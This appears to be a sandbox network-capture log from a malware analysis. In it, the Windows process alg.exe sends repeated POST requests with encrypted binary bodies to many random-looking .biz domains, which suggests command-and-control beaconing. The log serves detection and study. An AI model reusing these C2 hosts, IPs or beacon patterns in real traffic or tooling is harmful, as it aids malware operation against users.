Set-Cookie: btst=f214832bab4336ab12c3342655e6ccc6|155.94.241.187|1731920289|1731920289|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
66          192.168.2.7  50045        47.129.31.212   80                5368  C:\Windows\System32\alg.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 18, 2024 09:58:08.847726107 CET  348                OUT        POST /rxjmtw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ftxlah.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:10.326430082 CET  414                IN         HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7476205b475e3191b64c5419b047b8fd|155.94.241.187|1731920290|1731920290|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
67          192.168.2.7  50046        44.221.84.105   80

Timestamp                            Bytes transferred  Direction  Data
Nov 18, 2024 09:58:10.290079117 CET  352                OUT        POST /ptgfiwe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: saytjshyf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842
Nov 18, 2024 09:58:10.886734962 CET  417                IN         HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=cad0206209c73d77d453287b6c3cff57|155.94.241.187|1731920290|1731920290|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
68          192.168.2.7  50047        18.141.10.107   80

Timestamp                            Bytes transferred  Direction  Data
Nov 18, 2024 09:58:11.026894093 CET  355                OUT        POST /jabraqcqvewg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vcddkls.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842
Nov 18, 2024 09:58:12.476957083 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=78c48a91aa8e51a082eafa29822e4725|155.94.241.187|1731920292|1731920292|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.7 | 50048 | 13.251.16.150 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:11.110744953 CET | 347 | OUT | POST /ipko HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: typgfhb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:11.110785961 CET | 778 | OUT | Data Raw: (binary request body)
Nov 18, 2024 09:58:12.558746099 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4f321ecc6b77338409e948531ca936c4|155.94.241.187|1731920292|1731920292|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
70 | 192.168.2.7 | 50049 | 172.234.222.138 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:12.501005888 CET | 353 | OUT | POST /jowqmtxqicfl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842
Nov 18, 2024 09:58:12.501075983 CET | 842 | OUT | Data Raw: (binary request body)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.7 | 50050 | 34.211.97.45 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:12.969628096 CET | 346 | OUT | POST /nfkpu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: esuzf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:12.969647884 CET | 778 | OUT | Data Raw: (binary request body)
Nov 18, 2024 09:58:13.826838970 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=88434270bd31afc77c04ccd91421e043|155.94.241.187|1731920293|1731920293|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 72 | Source IP: 192.168.2.7 | Source Port: 50051 | Destination IP: 172.234.222.138 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:13.184406996 CET | 352 | OUT | POST /fkgxppcjxls HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842
Nov 18, 2024 09:58:13.184406996 CET | 842 | OUT | Data Raw: (binary request body)


Session ID: 73 | Source IP: 192.168.2.7 | Source Port: 50052 | Destination IP: 34.246.200.160 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:13.869822979 CET | 348 | OUT | POST /ayxmva HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tbjrpv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842
Nov 18, 2024 09:58:13.869934082 CET | 842 | OUT | Data Raw: (binary request body)
Nov 18, 2024 09:58:14.841389894 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f37bcc702e1685e6c60a8ce536270374|155.94.241.187|1731920294|1731920294|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 74 | Source IP: 192.168.2.7 | Source Port: 50053 | Destination IP: 3.94.10.34 | Destination Port: 80 | PID: 5368 | Process: C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:14.125663042 CET | 361 | OUT | POST /eoxlhmklnxbyibsu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gvijgjwkh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:14.125680923 CET | 778 | OUT | Data Raw: (binary request body)
Nov 18, 2024 09:58:14.799864054 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f72ccfe20b4984754150c507fcd86def|155.94.241.187|1731920294|1731920294|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 75 | Source IP: 192.168.2.7 | Source Port: 50054 | Destination IP: 18.208.156.248 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:14.888737917 CET | 348 | OUT | POST /clakqqe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: deoci.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842
Nov 18, 2024 09:58:14.888737917 CET  842  OUT  Data Raw: 07 6c 5a ea 1c 11 05 60 3e 03 00 00 c2 61 99 1b f1 cf 9a 96 99 c8 3e 18 5d eb 1f ed f2 fc ad c2 10 99 a2 cc 94 38 c8 44 82 72 28 49 b3 8e e9 c8 1f c4 9b 17 a8 de 96 91 94 50 05 92 ee 9e d2 e2 71 8e 77 c2 43 b2 25 d7 bb 36 d6 4d b0 e1 88 13 48 34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: lZ`>a>]8Dr(IPqwC%6MH4o[xJMQ{ m`tslBtm`9UYcA&slXf;G1o e'].l}hL*^xLvv,gw!`) ~9^^a>Ij!r^uI
Nov 18, 2024 09:58:15.579406023 CET  413  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=167dca44e0d597b16c76185c93e1823c|155.94.241.187|1731920295|1731920295|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
76          192.168.2.7  50055        18.246.231.120  80                5368  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Nov 18, 2024 09:58:15.047622919 CET  350  OUT  POST /wlytwhn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:15.047622919 CET  778  OUT  Data Raw: 49 75 ba bd ad a6 54 ad fe 02 00 00 9c 72 4a 61 a8 37 9e 0d ad 07 d3 58 f6 46 41 6c 97 4c f9 51 ed 05 b1 5d a2 28 0f 99 83 d1 b6 e6 fa 39 fb 19 1b 2c 1d 0e 5f 9d cd 48 09 53 51 f1 4a 07 a4 b6 38 7d 09 32 54 a7 eb 10 91 f4 8e 57 f2 44 89 34 67 3f
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: IuTrJa7XFAlLQ](9,_HSQJ8}2TWD4g?|="F:Xq7$f$Ub+W]W %sbRE2;C^*G$Mv-j2HL],1/*ij[w@nz0'-JE4RFby
Nov 18, 2024 09:58:15.885859966 CET  415  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=bdd6c6ea2a6f78c21b5e0a69ce5d0adf|155.94.241.187|1731920295|1731920295|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
77          192.168.2.7  50056        208.100.26.245  80
Timestamp  Bytes transferred  Direction  Data
Nov 18, 2024 09:58:15.599620104 CET  348  OUT  POST /nnuy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:15.599632978 CET  842  OUT  Data Raw: 33 55 8e fd 8f a8 a2 da 3e 03 00 00 00 a9 d2 b0 f9 e7 ca 6a 72 b3 b1 e4 62 1f 3f 40 e0 92 8b b2 ba e6 36 4a ef fb df d6 00 fb 03 91 a9 25 f0 22 cf 94 5c 74 dc 1c fa fb 1b b2 e0 aa 53 ca 27 e6 bc 70 cc cc c3 b7 d6 82 37 0b a9 17 f1 70 90 b5 b9 a8
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 3U>jrb?@6J%"\tS'p7pU&bnFY".##!DT|7%>{~zb&1cbt+j}JF7j:gb<GZs>9sV6|A%u`]f,vQeAq93
Nov 18, 2024 09:58:16.237180948 CET  744  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 18, 2024 09:58:16.238301992 CET  346  OUT  POST /sv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:16.238301992 CET  842  OUT  Data Raw: 61 55 c3 45 49 d1 eb 3a 3e 03 00 00 f1 b3 9e 8c 32 68 25 5a df b2 19 18 c3 3d de ce 2b ce ac a1 d8 00 b2 36 a3 24 75 a6 43 50 bd a3 e6 b9 51 3b 29 41 66 65 9e eb f7 e1 2f 6a dc 9b 53 3b 6f 5e d6 1d 7a a3 30 a7 fd 9e 10 4e e2 d6 93 7f 8b 81 4e c1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: aUEI:>2h%Z=+6$uCPQ;)Afe/jS;o^z0NN@Tkvo=qT@zd'?L46VB%iZH}vL!E(+~'AvL1/e9l2&"F#{yx4"b>*K4<
Nov 18, 2024 09:58:16.383516073 CET 744 IN HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 18, 2024 09:58:24.399554014 CET 356 OUT POST /hunwmwyhqkxby HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:24.545331001 CET 744 IN HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 18, 2024 09:58:24.549509048 CET 352 OUT POST /ehsrasnoy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:24.694561958 CET 744 IN HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 18, 2024 09:59:05.604932070 CET 353 OUT POST /xnflybxi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:59:05.932612896 CET 744 IN HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:59:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 18, 2024 09:59:05.933841944 CET | 352 | OUT | POST /hijuvcy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:59:05.933867931 CET | 842 | OUT | Data Raw: 66 a0 86 08 16 a0 93 f3 3e 03 00 00 e6 0d 48 5f 5b 20 80 66 b3 21 6f cc 0e 3c fc 35 d3 a7 d7 01 36 54 32 57 b8 48 30 e0 9f fc 82 02 79 6a 5a 84 79 12 38 51 3a ab 02 b0 1e 30 98 12 40 74 ad 42 84 6f 50 6f a5 e3 b0 43 e3 b9 2f 79 32 d8 c4 bb 30 5c
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: f>H_[ f!o<56T2WH0yjZy8Q:0@tBoPoC/y20\^Z M}S*!miqftSBH@*CoQLdM'2g%2..pTs{P[U"6wk@*SE6
Nov 18, 2024 09:59:06.080708981 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:59:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.7 | 50057 | 3.254.94.185 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:16.167325974 CET | 357 | OUT | POST /fflfjsnvrvmguebc HTTP/1.1
